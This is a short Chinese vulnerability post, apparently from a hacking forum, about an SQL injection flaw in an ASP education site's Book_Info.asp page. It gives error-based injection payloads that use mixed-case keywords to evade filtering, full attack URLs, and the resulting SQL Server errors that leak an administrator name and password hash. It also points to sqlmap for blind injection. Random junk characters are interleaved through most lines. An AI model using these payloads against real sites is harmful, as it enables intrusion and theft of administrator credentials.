漏洞出现在Educate/Book_Info.asp / j1 m2 c& I7 j8 d( v" {# J: `6 [
$ m8 k, z0 G4 ~+ M, E此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
2 j4 U6 {8 h# r1 W8 t3 Q5 w
. w# [# S; Q2 J- k2 R9 jexp:如下
- }! z/ m* I5 n3 @8 [查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
0 ^# N! U; a5 W; Y1 l9 M) I5 l) M查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
0 ^# h5 ]6 V' f1 E$ N5 e 8 W" w8 ~5 G; M0 ?- X. `
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)2 C; _- [: t4 ^; {/ I; I! Y+ g A- `
0 z& i5 W F% d$ ]: o# |! [. g9 W
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'8 W/ {$ \/ E( X) k
, {- R# z! v$ E4 A
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。9 \$ p# |6 w/ L$ W: q5 L/ c
; d% [! J6 F" `# _2 E1 f( N/ r1 U/Educate/Book_Info.asp,行 8
3 l7 {& j* ~" D- F- N( H7 l
+ {% X6 @2 y* r7 G9 s; @9 vhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)/ p) M0 u) r0 h, }
7 J( ~8 q" R$ g" z2 i
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'8 @3 Q& c( y+ C
2 ?) B* R2 R/ Z7 @6 U6 |将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。( U; @3 V8 o R7 N
' j( ^& Y' a, l! E5 k
/Educate/Book_Info.asp,行 8' f: h" W) v' }1 X! k( k+ g
|